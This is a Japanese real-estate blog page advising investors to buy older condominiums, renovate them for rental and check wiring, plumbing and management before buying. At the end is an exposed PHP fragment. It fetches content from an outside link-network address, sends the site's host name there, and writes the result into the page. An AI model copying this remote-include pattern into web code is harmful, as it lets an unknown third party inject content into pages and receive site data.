前へ
次へ

貸すという賃貸マンション

賃貸マンション向けに物件を購入してからは、リフォームやリノベーションを行うなどして、前の居住者の生活感を払拭させて改善させることにより、空室リスクを減らすことに期待ができます。一棟買いでなくともワンフロア、一室だけの購入からでも賃貸マンションとして貸し出しができます。中古マンションの場合には、前の居住者がリフォームをしていることもあります。個性的な室内を気に入る人もいれば、気に入らない人もいます。だからといって、見学した間取りが好みではないとか、見た目が汚いなどのマイナスに思うことは損です。むしろ、積極的にリフォームやリノベーションをすることで、快適でかつ、オーナー好みやまだ見ぬ入居者好みの住まいにできます。そう考えれば、築30年を超える賃貸マンションでも、リフォームやリノベーションによって新築と見間違えるほどに変貌する可能性さえあります。もちろん、多くの方は購入するならば新築でしょう。しかし、今のご時世、供給数を抑える現状が続いていますし、購入しやすいように価格を抑え、その結果は建築のグレードが下げられています。平々凡々、そうした建築プランならば、新築にこだわる必要はないでしょう。しかし、ここには注意点があって『知識』をしっかり得てから購入することにあります。借り手ならば、失敗したと分かれば、引っ越しすればいいだけですが、貸し手が失敗することは収益性がなくなることに繋がります。しかし、賃貸においての失敗は、管理のチェック不足や、物件を見た目でしかチェックをしないことにあります。例えば、エアコンと電子レンジを同時に使ったらブレーカーが落ちたり、給水管が傷んでいて水漏れが発生することも無きにしもあらず、張りぼてだらけのリフォームが施されていることもあります。しかし、立地や日当たり、風通し、ベランダからの見晴らしなどにおいては高台にある戸建てでもない限りは、マンションならではの魅力になり得るでしょう。徹底的に改修すればいいだけ、失敗は成功のもとです。

".file_get_contents('http://links-001.com/kanren3set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top